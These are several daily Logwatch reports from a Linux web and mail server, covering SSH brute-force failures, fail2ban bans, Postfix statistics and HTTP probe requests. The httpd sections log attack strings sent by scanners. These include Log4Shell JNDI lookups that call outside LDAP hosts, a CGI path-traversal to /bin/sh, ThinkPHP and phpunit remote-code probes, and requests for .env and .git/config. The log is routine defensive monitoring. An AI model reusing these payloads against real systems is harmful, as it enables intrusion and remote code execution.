backup (194.61.26.211): 1 Time(s)
postgres (46.161.27.162): 1 Time(s)
root (1.15.181.252): 1 Time(s)
root (103.133.57.250): 1 Time(s)
root (164.90.203.55): 1 Time(s)
root (182.74.25.246): 1 Time(s)
root (189.254.255.3): 1 Time(s)
root (210.74.11.97): 1 Time(s)
temp (50.142.80.34.bc.googleusercontent.com): 1 Time(s)
unknown (115.248.153.89): 1 Time(s)
unknown (134.236.247.145): 1 Time(s)
unknown (146.185.79.101): 1 Time(s)
unknown (178-117-237-173.access.telenet.be): 1 Time(s)
unknown (179.112.19.24): 1 Time(s)
unknown (server.kompraqui.com): 1 Time(s)
Invalid Users:
Unknown Account: 154 Time(s)
---------------------- pam_unix End -------------------------
--------------------- Postfix Begin ------------------------
1 Miscellaneous warnings
8.837K Bytes accepted 9,049
8.837K Bytes sent via SMTP 9,049
======== ==================================================
1 Accepted 100.00%
-------- --------------------------------------------------
1 Total 100.00%
======== ==================================================
4 4xx Reject relay denied 100.00%
-------- --------------------------------------------------
4 Total 4xx Rejects 100.00%
======== ==================================================
38 Connections
28 Connections lost (inbound)
38 Disconnections
1 Removed from queue
1 Sent via SMTP
1 SMTP dialog errors
2 Hostname verification errors (FCRDNS)
---------------------- Postfix End -------------------------
--------------------- sendmail-largeboxes (large mail spool files) Begin ------------------------
Large Mailbox threshold: 40MB (41943040 bytes)
Warning: Large mailbox: mailman.gz (1747199807)
Warning: Large mailbox: mailman (235703599967)
---------------------- sendmail-largeboxes (large mail spool files) End -------------------------
--------------------- SSHD Begin ------------------------
Failed logins from:
1.15.181.252: 1 time
34.80.142.50 (50.142.80.34.bc.googleusercontent.com): 27 times
46.161.27.162: 1 time
60.255.230.126: 8 times
103.133.57.250: 1 time
106.13.6.113: 19 times
113.110.166.25: 20 times
113.116.5.156: 11 times
115.248.153.89: 2 times
139.59.228.214: 35 times
151.106.38.100 (ns3152155.ip-151-106-38.eu): 10 times
164.90.203.55: 1 time
178.117.237.173 (178-117-237-173.access.telenet.be): 5 times
179.112.19.24 (179-112-19-24.user.vivozap.com.br): 4 times
180.76.57.58: 36 times
182.74.25.246: 1 time
189.254.255.3 (customer-189-254-255-3-sta.uninet-ide.com.mx): 1 time
194.61.26.211: 1 time
201.119.167.25: 9 times
201.217.143.51 (r201-217-143-51.ir-static.anteldata.net.uy): 33 times
203.160.55.212: 11 times
210.74.11.97: 1 time
211.26.187.128 (128.187.26.211.sta.commander.net.au): 2 times
Illegal users from:
2001:470:1:c84::29: 1 time
undef: 121 times
2.195.224.165: 2 times
34.80.142.50 (50.142.80.34.bc.googleusercontent.com): 12 times
59.29.227.55: 2 times
60.255.230.126: 5 times
64.62.197.152: 1 time
91.182.94.240 (240.94-182-91.adsl-dyn.isp.belgacom.be): 2 times
106.13.6.113: 11 times
113.110.166.25: 6 times
114.80.85.75: 21 times
115.248.153.89: 1 time
134.236.247.145: 1 time
139.59.228.214: 15 times
146.185.79.101: 1 time
151.106.38.100 (ns3152155.ip-151-106-38.eu): 5 times
154.89.5.72: 1 time
162.214.53.159 (server.kompraqui.com): 1 time
176.125.36.117 (117-36-125-176.wifipon-rsbit.uar.net): 2 times
178.117.237.173 (178-117-237-173.access.telenet.be): 1 time
179.112.19.24 (179-112-19-24.user.vivozap.com.br): 1 time
180.76.57.58: 11 times
194.61.26.211: 2 times
201.119.167.25: 20 times
201.217.143.51 (r201-217-143-51.ir-static.anteldata.net.uy): 17 times
203.160.55.212: 8 times
211.26.187.128 (128.187.26.211.sta.commander.net.au): 5 times
220.177.194.10: 2 times
---------------------- SSHD End -------------------------
--------------------- Disk Space Begin ------------------------
Filesystem Size Used Avail Use% Mounted on
/dev/ploop33257p1 394G 242G 132G 65% /
none 4.0G 0 4.0G 0% /dev
---------------------- Disk Space End -------------------------
###################### Logwatch End #########################
3 Jahre, 10 Monate
- 1
- 0
Logwatch for h2361197.stratoserver.net (Linux)
by root@zapf.in
################### Logwatch 7.4.0 (03/01/11) ####################
Processing Initiated: Fri Dec 17 04:42:04 2021
Date Range Processed: yesterday
( 2021-Dec-16 )
Period is day.
Detail Level of Output: 0
Type of Output/Format: mail / text
Logfiles for Host: h2361197.stratoserver.net
##################################################################
--------------------- fail2ban-messages Begin ------------------------
Banned services with Fail2Ban: Bans:Unbans
ssh: [ 23:23 ]
---------------------- fail2ban-messages End -------------------------
--------------------- httpd Begin ------------------------
A total of 9 sites probed the server
117.198.250.231
156.251.172.207
167.71.102.95
178.72.75.84
20.101.106.180
20.121.13.154
61.219.11.151
66.240.205.34
66.240.219.146
Requests with error response codes
400 Bad Request
null: 17 Time(s)
mstshash=Administr: 2 Time(s)
mstshash=Domain: 2 Time(s)
/.git/config: 1 Time(s)
/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh: 1 Time(s)
/config/getuser?index=0: 1 Time(s)
/pVOG: 1 Time(s)
\xB1\xC5\xDC(\xE8\x00\x00\x00\x00\x00: 1 Time(s)
404 Not Found
//2018/wp-includes/wlwmanifest.xml: 1 Time(s)
//2019/wp-includes/wlwmanifest.xml: 1 Time(s)
//blog/wp-includes/wlwmanifest.xml: 1 Time(s)
//cms/wp-includes/wlwmanifest.xml: 1 Time(s)
//media/wp-includes/wlwmanifest.xml: 1 Time(s)
//news/wp-includes/wlwmanifest.xml: 1 Time(s)
//shop/wp-includes/wlwmanifest.xml: 1 Time(s)
//site/wp-includes/wlwmanifest.xml: 1 Time(s)
//sito/wp-includes/wlwmanifest.xml: 1 Time(s)
//test/wp-includes/wlwmanifest.xml: 1 Time(s)
//web/wp-includes/wlwmanifest.xml: 1 Time(s)
//website/wp-includes/wlwmanifest.xml: 1 Time(s)
//wordpress/wp-includes/wlwmanifest.xml: 1 Time(s)
//wp-includes/wlwmanifest.xml: 1 Time(s)
//wp/wp-includes/wlwmanifest.xml: 1 Time(s)
//wp1/wp-includes/wlwmanifest.xml: 1 Time(s)
//wp2/wp-includes/wlwmanifest.xml: 1 Time(s)
//xmlrpc.php?rsd: 1 Time(s)
499 (undefined)
/: 5 Time(s)
/${jndi:ldap://31.131.16.127:1389/Exploit}: 1 Time(s)
/login: 1 Time(s)
500 Internal Server Error
/: 30 Time(s)
/.env: 4 Time(s)
/Autodiscover/Autodiscover.xml: 2 Time(s)
/_ignition/execute-solution: 2 Time(s)
/console/: 2 Time(s)
/robots.txt: 2 Time(s)
/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 2 Time(s)
/.git/config: 1 Time(s)
/.well-known/security.txt: 1 Time(s)
/?x=${jndi:ldap://195.54.160.149:12344/Bas ... I6NDQzKXxiYXNo}: 1 Time(s)
/favicon.ico: 1 Time(s)
/index.php?s=/Index/\x5Cthink\x5Capp/invok ... HelloThinkPHP21: 1 Time(s)
/remote/login?lang=en: 1 Time(s)
/sitemap.xml: 1 Time(s)
---------------------- httpd End -------------------------
--------------------- pam_unix Begin ------------------------
sshd:
Authentication Failures:
root (159.75.216.168): 37 Time(s)
root (212.64.91.71): 34 Time(s)
root (61.160.251.98): 20 Time(s)
root (223.99.170.130): 18 Time(s)
unknown (212.64.91.71): 16 Time(s)
root (106.13.27.134): 15 Time(s)
unknown (61.160.251.98): 15 Time(s)
unknown (159.75.216.168): 13 Time(s)
root (ns3152155.ip-151-106-38.eu): 12 Time(s)
unknown (ns3152155.ip-151-106-38.eu): 10 Time(s)
root (96.78.175.36): 9 Time(s)
root (164.90.217.133): 7 Time(s)
unknown (106.13.27.134): 7 Time(s)
root (161.35.205.46): 6 Time(s)
root (177.249.43.20): 6 Time(s)
root (175.209.89.234): 5 Time(s)
unknown (164.90.217.133): 5 Time(s)
unknown (96.78.175.36): 5 Time(s)
root (117.66.243.77): 4 Time(s)
root (45.124.144.116): 3 Time(s)
unknown (223.99.170.130): 3 Time(s)
unknown (114.30.126.78.rev.sfr.net): 2 Time(s)
unknown (117.89.142.214): 2 Time(s)
unknown (161.35.205.46): 2 Time(s)
unknown (195.141.53.65): 2 Time(s)
unknown (65.212.254.95): 2 Time(s)
unknown (c193-183-241-159.customer.sandnet.se): 2 Time(s)
mysql (164.90.217.133): 1 Time(s)
news (180.250.248.169): 1 Time(s)
root (36.110.142.212): 1 Time(s)
root (oc-144-21-87-42.compute.oraclecloud.com): 1 Time(s)
unknown (117.66.243.77): 1 Time(s)
unknown (141.98.10.202): 1 Time(s)
unknown (175.209.89.234): 1 Time(s)
unknown (45.124.144.116): 1 Time(s)
unknown (45.141.84.10): 1 Time(s)
Invalid Users:
Unknown Account: 91 Time(s)
---------------------- pam_unix End -------------------------
--------------------- Postfix Begin ------------------------
2 Miscellaneous warnings
8.896K Bytes accepted 9,109
8.896K Bytes sent via SMTP 9,109
======== ==================================================
1 Accepted 100.00%
-------- --------------------------------------------------
1 Total 100.00%
======== ==================================================
2 4xx Reject relay denied 100.00%
-------- --------------------------------------------------
2 Total 4xx Rejects 100.00%
======== ==================================================
26 Connections
14 Connections lost (inbound)
26 Disconnections
1 Removed from queue
1 Sent via SMTP
1 Timeouts (inbound)
1 Hostname verification errors (FCRDNS)
---------------------- Postfix End -------------------------
--------------------- sendmail-largeboxes (large mail spool files) Begin ------------------------
Large Mailbox threshold: 40MB (41943040 bytes)
Warning: Large mailbox: mailman.gz (1747199807)
Warning: Large mailbox: mailman (235703599967)
---------------------- sendmail-largeboxes (large mail spool files) End -------------------------
--------------------- SSHD Begin ------------------------
Failed logins from:
36.110.142.212: 1 time
45.124.144.116: 3 times
61.160.251.98: 20 times
96.78.175.36 (96-78-175-36-static.hfc.comcastbusiness.net): 9 times
106.13.27.134: 15 times
117.66.243.77: 4 times
144.21.87.42 (oc-144-21-87-42.compute.oraclecloud.com): 1 time
151.106.38.100 (ns3152155.ip-151-106-38.eu): 12 times
159.75.216.168: 37 times
161.35.205.46: 6 times
164.90.217.133: 8 times
175.209.89.234: 5 times
177.249.43.20 (177.249.43.20-clientes-zap-izzi.mx): 6 times
180.250.248.169: 1 time
212.64.91.71: 34 times
223.99.170.130: 18 times
Illegal users from:
2001:470:1:332::8: 1 time
undef: 61 times
45.124.144.116: 1 time
45.141.84.10: 1 time
61.160.251.98: 15 times
64.62.197.152: 1 time
65.212.254.95: 2 times
78.126.30.114 (114.30.126.78.rev.sfr.net): 2 times
96.78.175.36 (96-78-175-36-static.hfc.comcastbusiness.net): 5 times
106.13.27.134: 7 times
117.66.243.77: 1 time
117.89.142.214: 2 times
141.98.10.202: 1 time
151.106.38.100 (ns3152155.ip-151-106-38.eu): 10 times
159.75.216.168: 13 times
161.35.205.46: 2 times
164.90.217.133: 5 times
175.209.89.234: 1 time
178.73.215.171 (178-73-215-171-static.glesys.net): 1 time
193.183.241.159 (c193-183-241-159.customer.sandnet.se): 2 times
195.141.53.65: 2 times
212.64.91.71: 16 times
223.99.170.130: 3 times
---------------------- SSHD End -------------------------
--------------------- Disk Space Begin ------------------------
Filesystem Size Used Avail Use% Mounted on
/dev/ploop33257p1 394G 242G 132G 65% /
none 4.0G 0 4.0G 0% /dev
---------------------- Disk Space End -------------------------
###################### Logwatch End #########################
3 Jahre, 10 Monate
- 1
- 0
Logwatch for h2361197.stratoserver.net (Linux)
by root@zapf.in
################### Logwatch 7.4.0 (03/01/11) ####################
Processing Initiated: Thu Dec 16 04:42:04 2021
Date Range Processed: yesterday
( 2021-Dec-15 )
Period is day.
Detail Level of Output: 0
Type of Output/Format: mail / text
Logfiles for Host: h2361197.stratoserver.net
##################################################################
--------------------- fail2ban-messages Begin ------------------------
Banned services with Fail2Ban: Bans:Unbans
ssh: [ 25:25 ]
---------------------- fail2ban-messages End -------------------------
--------------------- httpd Begin ------------------------
A total of 4 sites probed the server
159.89.116.96
167.99.82.16
183.167.205.82
67.207.84.198
Requests with error response codes
400 Bad Request
mstshash=Administr: 13 Time(s)
null: 12 Time(s)
/config/getuser?index=0: 4 Time(s)
/: 3 Time(s)
mstshash=Domain: 2 Time(s)
/.env: 1 Time(s)
/ab2g: 1 Time(s)
/ab2h: 1 Time(s)
/socket.io/?noteId=37Wy_2oZREmwoRnOgX-yAA& ... CQ1Cy5usQUqAABy: 1 Time(s)
/socket.io/?noteId=37Wy_2oZREmwoRnOgX-yAA& ... wv0JCy1YeZ2AABz: 1 Time(s)
/sra_{BA195980-CD49-458b-9E23-C84EE0ADCD75}/: 1 Time(s)
/zALU: 1 Time(s)
7: 1 Time(s)
HTTP/1.0: 1 Time(s)
XP|'|'|No|'|'|0.6.4|'|'|..|'|'||'|'|[endof]: 1 Time(s)
\xA3\x85H\xED\xCB\x85_\xAB^: 1 Time(s)
\xB1\xBET\xA4\x9AZ\x9A\xA0?\x90\xE0\xF2t0\ ... J\xA9<\xBD\xDA`: 1 Time(s)
499 (undefined)
/socket.io/?noteId=37Wy_2oZREmwoRnOgX-yAA& ... CQ1Cy5usQUqAABy: 1 Time(s)
/socket.io/?noteId=37Wy_2oZREmwoRnOgX-yAA& ... Gabaq-kQahdAAB0: 1 Time(s)
/socket.io/?noteId=37Wy_2oZREmwoRnOgX-yAA& ... wv0JCy1YeZ2AABz: 1 Time(s)
500 Internal Server Error
/: 19 Time(s)
/.env: 7 Time(s)
/robots.txt: 5 Time(s)
/?XDEBUG_SESSION_START=phpstorm: 2 Time(s)
/ecp/Current/exporttool/microsoft.exchange ... ool.application: 2 Time(s)
/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 2 Time(s)
/Autodiscover/Autodiscover.xml: 1 Time(s)
/ReportServer: 1 Time(s)
/_ignition/execute-solution: 1 Time(s)
/_profiler/phpinfo: 1 Time(s)
/actuator/health: 1 Time(s)
/console/: 1 Time(s)
/debug/default/view?panel=config: 1 Time(s)
/index.php?s=/Index/\x5Cthink\x5Capp/invok ... HelloThinkPHP21: 1 Time(s)
/login: 1 Time(s)
/mifs/.;/services/LogService: 1 Time(s)
/owa/auth/logon.aspx: 1 Time(s)
/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f: 1 Time(s)
/owa/auth/x.js: 1 Time(s)
---------------------- httpd End -------------------------
--------------------- pam_unix Begin ------------------------
sshd:
Authentication Failures:
root (219.135.209.164): 36 Time(s)
root (58.246.71.26): 36 Time(s)
root (117.48.157.83): 35 Time(s)
root (200.195.169.59): 32 Time(s)
root (106.75.179.87): 30 Time(s)
root (120.92.134.94): 18 Time(s)
root (42.159.80.91): 18 Time(s)
unknown (106.75.179.87): 18 Time(s)
unknown (200.195.169.59): 18 Time(s)
root (81.91.144.178): 17 Time(s)
root (leased-line-93-191-100-124.telecom.by): 17 Time(s)
root (117.66.243.77): 14 Time(s)
unknown (219.135.209.164): 14 Time(s)
unknown (58.246.71.26): 14 Time(s)
unknown (117.48.157.83): 11 Time(s)
root (210.22.128.214): 9 Time(s)
unknown (120.92.134.94): 9 Time(s)
unknown (42.159.80.91): 9 Time(s)
unknown (117.66.243.77): 6 Time(s)
unknown (167.71.236.111): 6 Time(s)
unknown (81.91.144.178): 6 Time(s)
unknown (leased-line-93-191-100-124.telecom.by): 6 Time(s)
unknown (210.22.128.214): 5 Time(s)
root (164.70.90.31): 4 Time(s)
root (1.235.192.218): 2 Time(s)
unknown (203.228.100.41): 2 Time(s)
unknown (dynamic-095-116-085-199.95.116.pool.telefonica.de): 2 Time(s)
unknown (lfbn-cor-1-98-221.w86-211.abo.wanadoo.fr): 2 Time(s)
root (1.245.237.130): 1 Time(s)
root (125.18.94.20): 1 Time(s)
root (167.71.236.111): 1 Time(s)
unknown (1.235.192.218): 1 Time(s)
unknown (116.110.19.131): 1 Time(s)
unknown (164.70.90.31): 1 Time(s)
unknown (205.185.124.219): 1 Time(s)
unknown (46.161.27.162): 1 Time(s)
unknown (92.255.85.237): 1 Time(s)
unknown (kalium.0x49.net): 1 Time(s)
Invalid Users:
Unknown Account: 135 Time(s)
---------------------- pam_unix End -------------------------
--------------------- Postfix Begin ------------------------
5 Miscellaneous warnings
8.895K Bytes accepted 9,108
8.895K Bytes sent via SMTP 9,108
======== ==================================================
1 Accepted 100.00%
-------- --------------------------------------------------
1 Total 100.00%
======== ==================================================
3 4xx Reject relay denied 100.00%
-------- --------------------------------------------------
3 Total 4xx Rejects 100.00%
======== ==================================================
25 Connections
14 Connections lost (inbound)
25 Disconnections
1 Removed from queue
1 Sent via SMTP
1 Hostname verification errors (FCRDNS)
---------------------- Postfix End -------------------------
--------------------- sendmail-largeboxes (large mail spool files) Begin ------------------------
Large Mailbox threshold: 40MB (41943040 bytes)
Warning: Large mailbox: mailman.gz (1747199807)
Warning: Large mailbox: mailman (235703599967)
---------------------- sendmail-largeboxes (large mail spool files) End -------------------------
--------------------- SSHD Begin ------------------------
Failed logins from:
1.235.192.218: 2 times
1.245.237.130: 1 time
42.159.80.91: 18 times
58.246.71.26: 36 times
81.91.144.178: 17 times
93.191.100.124 (leased-line-93-191-100-124.telecom.by): 17 times
106.75.179.87: 30 times
117.48.157.83: 35 times
117.66.243.77: 14 times
120.92.134.94: 18 times
125.18.94.20: 1 time
164.70.90.31 (164-70-90-31.indigo.static.arena.ne.jp): 4 times
167.71.236.111: 1 time
200.195.169.59 (59.169.195.200.static.copel.net): 32 times
210.22.128.214: 9 times
219.135.209.164 (164.209.135.219.broad.gz.gd.dynamic.163data.com.cn): 36 times
Illegal users from:
2001:470:1:c84::14: 1 time
undef: 90 times
1.235.192.218: 1 time
42.159.80.91: 9 times
46.161.27.162: 1 time
58.246.71.26: 14 times
65.49.20.69 (scan-20.shadowserver.org): 1 time
81.91.144.178: 6 times
86.211.186.221 (lfbn-cor-1-98-221.w86-211.abo.wanadoo.fr): 2 times
92.255.85.237: 1 time
93.191.100.124 (leased-line-93-191-100-124.telecom.by): 6 times
95.116.85.199 (dynamic-095-116-085-199.95.116.pool.telefonica.de): 2 times
106.75.169.79: 1 time
106.75.179.87: 18 times
116.110.19.131: 1 time
117.48.157.83: 11 times
117.66.243.77: 6 times
120.92.134.94: 9 times
164.70.90.31 (164-70-90-31.indigo.static.arena.ne.jp): 1 time
167.71.236.111: 6 times
198.98.53.212 (kalium.0x49.net): 1 time
200.195.169.59 (59.169.195.200.static.copel.net): 18 times
203.228.100.41: 2 times
205.185.124.219 (smtp2.jreama.shop): 1 time
210.22.128.214: 5 times
219.135.209.164 (164.209.135.219.broad.gz.gd.dynamic.163data.com.cn): 14 times
---------------------- SSHD End -------------------------
--------------------- Disk Space Begin ------------------------
Filesystem Size Used Avail Use% Mounted on
/dev/ploop33257p1 394G 242G 132G 65% /
none 4.0G 0 4.0G 0% /dev
---------------------- Disk Space End -------------------------
###################### Logwatch End #########################
3 Jahre, 10 Monate
- 1
- 0